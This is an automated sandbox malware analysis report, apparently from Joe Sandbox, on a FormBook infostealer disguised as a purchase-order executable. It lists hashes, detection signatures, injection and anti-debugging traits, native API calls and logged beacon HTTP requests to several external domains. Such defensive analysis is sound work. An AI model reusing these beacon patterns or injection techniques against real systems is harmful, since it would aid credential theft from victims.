Analysis Report Purchase Order 40,7045$.exe

Overview

General Information

Sample Name: Purchase Order 40,7045$.exe
Analysis ID: 321097
MD5: 4142c1713da2f4f94bec71bfed46587b
SHA1: 06cc7bd53758a0936f4b674847411a4f912fd654
SHA256: fd94ea05d07271de517e92af291ec6a8cff49cc83bb59f112efb6d5fec56809c
Tags: exe, Formbook

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
Executable has a suspicious name (potential lure to open the executable)
Initial sample is a PE file and has a suspicious name
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Uses ipconfig to lookup or modify the Windows network settings
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

AV Detection:

Antivirus / Scanner detection for submitted sample
Source: Purchase Order 40,7045$.exe Avira: detected
Multi AV Scanner detection for submitted file
Source: Purchase Order 40,7045$.exe Virustotal: Detection: 43%
Source: Purchase Order 40,7045$.exe ReversingLabs: Detection: 36%
Yara detected FormBook
Source: Yara match File source: 00000001.00000002.273597451.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.241734070.00000000013A0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.500733207.00000000001C0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.503235105.0000000002B00000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.273799475.0000000000E70000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.273823687.0000000000EA0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0.2.Purchase Order 40,7045$.exe.13a0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.Purchase Order 40,7045$.exe.13a0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.Purchase Order 40,7045$.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.Purchase Order 40,7045$.exe.400000.0.raw.unpack, type: UNPACKEDPE
Machine Learning detection for sample
Source: Purchase Order 40,7045$.exe Joe Sandbox ML: detected
Antivirus or Machine Learning detection for unpacked file
Source: 0.2.Purchase Order 40,7045$.exe.13a0000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 1.2.Purchase Order 40,7045$.exe.400000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen

Software Vulnerabilities:

Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 4x nop then pop edi 1_2_00415044
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 4x nop then pop edi 1_2_00415C88
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 4x nop then pop ebx 1_2_004066DA
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4x nop then pop edi 5_2_02B15044
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4x nop then pop ebx 5_2_02B066DA
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 4x nop then pop edi 5_2_02B15C88

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic Snort IDS: 1201 ATTACK-RESPONSES 403 Forbidden 34.102.136.180:80 -> 192.168.2.7:49763
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /igqu/?7nExDDz=UfiOKa10s1yLusAItF3vWjkwpymqUGezPxY1yDNv0p/2lCJES87tx2Jt/J4nqwS7zvQC3NAVFw==&znedzJ=zZ08lr HTTP/1.1 Host: www.maninhatphoto.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /igqu/?7nExDDz=OmOfrjMvab3UDLJ1b1EnqOCTc37h1hVhp845fGV3qso3nsvakJ1TSKu7MMbYjLc/Z57ALjfzyA==&znedzJ=zZ08lr HTTP/1.1 Host: www.placeduconfort.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /igqu/?7nExDDz=t01Z4mSXZ4Sh37CVT0clKULR+978aEmcgNm0lDgXJlNj84H6aHXl5y5X4iKe7OtShPmXJ1O/Pg==&znedzJ=zZ08lr HTTP/1.1 Host: www.heartandcrowncloset.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /igqu/?7nExDDz=e47LXRShpINFItPSGlU3D/kbksa3SWNeF5M0wKVSE3MTkWZptzimgsXyJgV91SEk9qVnlKbrpg==&znedzJ=zZ08lr HTTP/1.1 Host: www.fahufu.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /igqu/?7nExDDz=86BqMRXKwVnGWLvcWU9i/TAM/7rVhuijReL1UQww2BMw3v63ywTnKR2tmrSinvnZEbGuhDJZ6g==&znedzJ=zZ08lr HTTP/1.1 Host: www.the-gongs.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /igqu/?7nExDDz=93/Rz74I7LmyoPrfkHQz5Aq7QtSit3A8iuxJ0AYKOw4Fhqt5y6XHOpUvAHedIRknYvzWThccTQ==&znedzJ=zZ08lr HTTP/1.1 Host: www.shopnicknaks.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /igqu/?7nExDDz=YEhaVrRn7U1iAIlzVSLmJg7Vd2zqgykvRGHwZQMAJohu7B6Tc4aodga4QJsBa4H1R4p9GZQDmA==&znedzJ=zZ08lr HTTP/1.1 Host: www.sweetbasilmarketing.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /igqu/?7nExDDz=4h23ofVf0wd/XYFA6lbDKykObBKMIHvT+gmvC/ZN8Gk4kRGXSO1DXfeAEB+QG0mLIMq1kVYlzw==&znedzJ=zZ08lr HTTP/1.1 Host: www.justsoldbykristen.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /igqu/?7nExDDz=b5xSTUUVmbOqauvhDdE25zWaspHItZbymNmRh6QlTutVQGy0NN3SxEYa8xhGCB9WO75ae6tE3A==&znedzJ=zZ08lr HTTP/1.1 Host: www.ariasu-nakanokaikei.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /igqu/?7nExDDz=rdOgkBqGTQXOs3KWXTswN+BO77q1iYhhtKfbkpaHvFu47hc7CbfKDDDhaf9YD51rtmp9fiqQ6Q==&znedzJ=zZ08lr HTTP/1.1 Host: www.realitytvstockwatch.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /igqu/?7nExDDz=HPW2WyZF3+vAEuPCsfs94a0V0pGSpSCTGdq4luVMg5IcQk4WROkoYp4gl4PZZku0mN/660XlTQ==&znedzJ=zZ08lr HTTP/1.1 Host: www.searchnehomes.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /igqu/?7nExDDz=nB3I2im5F8HSwElcMB6r2r7aYFb3l14g4Fl69Fm1UyuWMpfJzwOjmqIJuIfJqip3lhGwdegm9w==&znedzJ=zZ08lr HTTP/1.1 Host: www.happinestbuilders.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /igqu/?7nExDDz=xFlHIrj+O5a3po2FyI6qdarcVpFay3CC2mUufkmJsWJU6dqoom027fC98Qm7USnQA3DnFd91lQ==&znedzJ=zZ08lr HTTP/1.1 Host: www.hemparcade.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 52.58.78.16
Source: Joe Sandbox View IP Address: 185.201.11.126
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: AMAZON-02US
Source: Joe Sandbox View ASN Name: DEDIPATH-LLCUS
Source: Joe Sandbox View ASN Name: AS-HOSTINGERLT
Source: unknown DNS traffic detected: queries for: www.handsfreedocs.com
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Fri, 20 Nov 2020 10:07:21 GMT Content-Type: text/html Content-Length: 153 Connection: close Server: nginx/1.16.1 Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 36 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.16.1</center></body></html>
Source: explorer.exe, 00000002.00000000.260797333.000000000BE76000.00000002.00000001.sdmp String found in binary or memory: http://fontfabrik.com
Source: explorer.exe, 00000002.00000000.260797333.000000000BE76000.00000002.00000001.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: explorer.exe, 00000002.00000002.517836476.0000000006845000.00000004.00000001.sdmp String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: explorer.exe, 00000002.00000000.260797333.000000000BE76000.00000002.00000001.sdmp String found in binary or memory: http://www.carterandcone.coml
Source: explorer.exe, 00000002.00000000.260797333.000000000BE76000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com
Source: explorer.exe, 00000002.00000000.260797333.000000000BE76000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers
Source: explorer.exe, 00000002.00000000.260797333.000000000BE76000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers/?
Source: explorer.exe, 00000002.00000000.260797333.000000000BE76000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: explorer.exe, 00000002.00000000.260797333.000000000BE76000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: explorer.exe, 00000002.00000000.260797333.000000000BE76000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers8
Source: explorer.exe, 00000002.00000000.260797333.000000000BE76000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers?
Source: explorer.exe, 00000002.00000000.260797333.000000000BE76000.00000002.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designersG
Source: explorer.exe, 00000002.00000000.260797333.000000000BE76000.00000002.00000001.sdmp String found in binary or memory: http://www.fonts.com
Source: explorer.exe, 00000002.00000000.260797333.000000000BE76000.00000002.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn
Source: explorer.exe, 00000002.00000000.260797333.000000000BE76000.00000002.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: explorer.exe, 00000002.00000000.260797333.000000000BE76000.00000002.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: explorer.exe, 00000002.00000000.260797333.000000000BE76000.00000002.00000001.sdmp String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: explorer.exe, 00000002.00000000.260797333.000000000BE76000.00000002.00000001.sdmp String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: explorer.exe, 00000002.00000000.260797333.000000000BE76000.00000002.00000001.sdmp String found in binary or memory: http://www.goodfont.co.kr
Source: ipconfig.exe, 00000005.00000002.505735248.00000000036FD000.00000004.00000001.sdmp String found in binary or memory: http://www.hemparcade.com
Source: ipconfig.exe, 00000005.00000002.505735248.00000000036FD000.00000004.00000001.sdmp String found in binary or memory: http://www.hemparcade.com/
Source: explorer.exe, 00000002.00000000.260797333.000000000BE76000.00000002.00000001.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: explorer.exe, 00000002.00000000.260797333.000000000BE76000.00000002.00000001.sdmp String found in binary or memory: http://www.sajatypeworks.com
Source: explorer.exe, 00000002.00000000.260797333.000000000BE76000.00000002.00000001.sdmp String found in binary or memory: http://www.sakkal.com
Source: explorer.exe, 00000002.00000000.260797333.000000000BE76000.00000002.00000001.sdmp String found in binary or memory: http://www.sandoll.co.kr
Source: explorer.exe, 00000002.00000000.260797333.000000000BE76000.00000002.00000001.sdmp String found in binary or memory: http://www.tiro.com
Source: explorer.exe, 00000002.00000000.260797333.000000000BE76000.00000002.00000001.sdmp String found in binary or memory: http://www.typography.netD
Source: explorer.exe, 00000002.00000000.260797333.000000000BE76000.00000002.00000001.sdmp String found in binary or memory: http://www.urwpp.deDPlease
Source: explorer.exe, 00000002.00000000.260797333.000000000BE76000.00000002.00000001.sdmp String found in binary or memory: http://www.zhongyicts.com.cn
Source: ipconfig.exe, 00000005.00000002.505735248.00000000036FD000.00000004.00000001.sdmp String found in binary or memory: http://yuyabo.com/

E-Banking Fraud:

Yara detected FormBook
Source: Yara match File source: 00000001.00000002.273597451.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.241734070.00000000013A0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.500733207.00000000001C0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.503235105.0000000002B00000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.273799475.0000000000E70000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.273823687.0000000000EA0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0.2.Purchase Order 40,7045$.exe.13a0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.Purchase Order 40,7045$.exe.13a0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.Purchase Order 40,7045$.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.Purchase Order 40,7045$.exe.400000.0.raw.unpack, type: UNPACKEDPE

System Summary:

Malicious sample detected (through community Yara rule)
Source: 00000001.00000002.273597451.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000002.273597451.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.241734070.00000000013A0000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.241734070.00000000013A0000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.500733207.00000000001C0000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.500733207.00000000001C0000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.503235105.0000000002B00000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.503235105.0000000002B00000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000001.00000002.273799475.0000000000E70000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000002.273799475.0000000000E70000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000001.00000002.273823687.0000000000EA0000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000002.273823687.0000000000EA0000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.Purchase Order 40,7045$.exe.13a0000.0.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0.2.Purchase Order 40,7045$.exe.13a0000.0.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.Purchase Order 40,7045$.exe.13a0000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0.2.Purchase Order 40,7045$.exe.13a0000.0.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 1.2.Purchase Order 40,7045$.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 1.2.Purchase Order 40,7045$.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 1.2.Purchase Order 40,7045$.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 1.2.Purchase Order 40,7045$.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Executable has a suspicious name (potential lure to open the executable)
Source: Purchase Order 40,7045$.exe Static file information: Suspicious name
Initial sample is a PE file and has a suspicious name
Source: initial sample Static PE information: Filename: Purchase Order 40,7045$.exe
Contains functionality to call native functions
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00417BA0 NtCreateFile, 1_2_00417BA0
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00417C50 NtReadFile, 1_2_00417C50
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00417CD0 NtClose, 1_2_00417CD0
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00417D80 NtAllocateVirtualMemory, 1_2_00417D80
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00417C4C NtReadFile, 1_2_00417C4C
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00417CCA NtClose, 1_2_00417CCA
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FC98F0 NtReadVirtualMemory,LdrInitializeThunk, 1_2_00FC98F0
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FC9860 NtQuerySystemInformation,LdrInitializeThunk, 1_2_00FC9860
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FC9840 NtDelayExecution,LdrInitializeThunk, 1_2_00FC9840
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FC99A0 NtCreateSection,LdrInitializeThunk, 1_2_00FC99A0
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FC9910 NtAdjustPrivilegesToken,LdrInitializeThunk, 1_2_00FC9910
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FC9A50 NtCreateFile,LdrInitializeThunk, 1_2_00FC9A50
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FC9A20 NtResumeThread,LdrInitializeThunk, 1_2_00FC9A20
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FC9A00 NtProtectVirtualMemory,LdrInitializeThunk, 1_2_00FC9A00
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FC95D0 NtClose,LdrInitializeThunk, 1_2_00FC95D0
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FC9540 NtReadFile,LdrInitializeThunk, 1_2_00FC9540
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FC96E0 NtFreeVirtualMemory,LdrInitializeThunk, 1_2_00FC96E0
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FC9660 NtAllocateVirtualMemory,LdrInitializeThunk, 1_2_00FC9660
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FC9FE0 NtCreateMutant,LdrInitializeThunk, 1_2_00FC9FE0
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FC97A0 NtUnmapViewOfSection,LdrInitializeThunk, 1_2_00FC97A0
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FC9780 NtMapViewOfSection,LdrInitializeThunk, 1_2_00FC9780
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FC9710 NtQueryInformationToken,LdrInitializeThunk, 1_2_00FC9710
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FC98A0 NtWriteVirtualMemory, 1_2_00FC98A0
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FCB040 NtSuspendThread, 1_2_00FCB040
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FC9820 NtEnumerateKey, 1_2_00FC9820
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FC99D0 NtCreateProcessEx, 1_2_00FC99D0
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FC9950 NtQueueApcThread, 1_2_00FC9950
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FC9A80 NtOpenDirectoryObject, 1_2_00FC9A80
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FC9A10 NtQuerySection, 1_2_00FC9A10
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FCA3B0 NtGetContextThread, 1_2_00FCA3B0
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FC9B00 NtSetValueKey, 1_2_00FC9B00
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FC95F0 NtQueryInformationFile, 1_2_00FC95F0
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FC9560 NtWriteFile, 1_2_00FC9560
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FCAD30 NtSetContextThread, 1_2_00FCAD30
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FC9520 NtWaitForSingleObject, 1_2_00FC9520
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FC96D0 NtCreateKey, 1_2_00FC96D0
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FC9670 NtQueryInformationProcess, 1_2_00FC9670
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FC9650 NtQueryValueKey, 1_2_00FC9650
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FC9610 NtEnumerateValueKey, 1_2_00FC9610
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FC9770 NtSetInformationFile, 1_2_00FC9770
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FCA770 NtOpenThread, 1_2_00FCA770
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FC9760 NtOpenProcess, 1_2_00FC9760
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FC9730 NtQueryVirtualMemory, 1_2_00FC9730
Source: C:\Users\user\Desktop\Purchase Order 40,7045$.exe Code function: 1_2_00FCA710 NtOpenProcessToken, 1_2_00FCA710
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02EB9A50 NtCreateFile,LdrInitializeThunk, 5_2_02EB9A50
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02EB9860 NtQuerySystemInformation,LdrInitializeThunk, 5_2_02EB9860
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02EB9840 NtDelayExecution,LdrInitializeThunk, 5_2_02EB9840
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02EB99A0 NtCreateSection,LdrInitializeThunk, 5_2_02EB99A0
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02EB9910 NtAdjustPrivilegesToken,LdrInitializeThunk, 5_2_02EB9910
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02EB96E0 NtFreeVirtualMemory,LdrInitializeThunk, 5_2_02EB96E0
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02EB96D0 NtCreateKey,LdrInitializeThunk, 5_2_02EB96D0
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02EB9FE0 NtCreateMutant,LdrInitializeThunk, 5_2_02EB9FE0
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02EB9780 NtMapViewOfSection,LdrInitializeThunk, 5_2_02EB9780
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02EB9710 NtQueryInformationToken,LdrInitializeThunk, 5_2_02EB9710
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02EB95D0 NtClose,LdrInitializeThunk, 5_2_02EB95D0
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02EB9540 NtReadFile,LdrInitializeThunk, 5_2_02EB9540
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02EB9A80 NtOpenDirectoryObject, 5_2_02EB9A80
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02EB9A20 NtResumeThread, 5_2_02EB9A20
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02EB9A00 NtProtectVirtualMemory, 5_2_02EB9A00
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02EB9A10 NtQuerySection, 5_2_02EB9A10
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02EBA3B0 NtGetContextThread, 5_2_02EBA3B0
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02EB9B00 NtSetValueKey, 5_2_02EB9B00
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02EB98F0 NtReadVirtualMemory, 5_2_02EB98F0
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02EB98A0 NtWriteVirtualMemory, 5_2_02EB98A0
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02EBB040 NtSuspendThread, 5_2_02EBB040
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02EB9820 NtEnumerateKey, 5_2_02EB9820
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02EB99D0 NtCreateProcessEx, 5_2_02EB99D0
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02EB9950 NtQueueApcThread, 5_2_02EB9950
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02EB9660 NtAllocateVirtualMemory, 5_2_02EB9660
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02EB9670 NtQueryInformationProcess, 5_2_02EB9670
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02EB9650 NtQueryValueKey, 5_2_02EB9650
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02EB9610 NtEnumerateValueKey, 5_2_02EB9610
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02EB97A0 NtUnmapViewOfSection, 5_2_02EB97A0
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02EB9760 NtOpenProcess, 5_2_02EB9760
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02EBA770 NtOpenThread, 5_2_02EBA770
Source: C:\Windows\SysWOW64\ipconfig.exe Code function: 5_2_02EB9770 NtSetInformationFile, 5_2_02EB9770
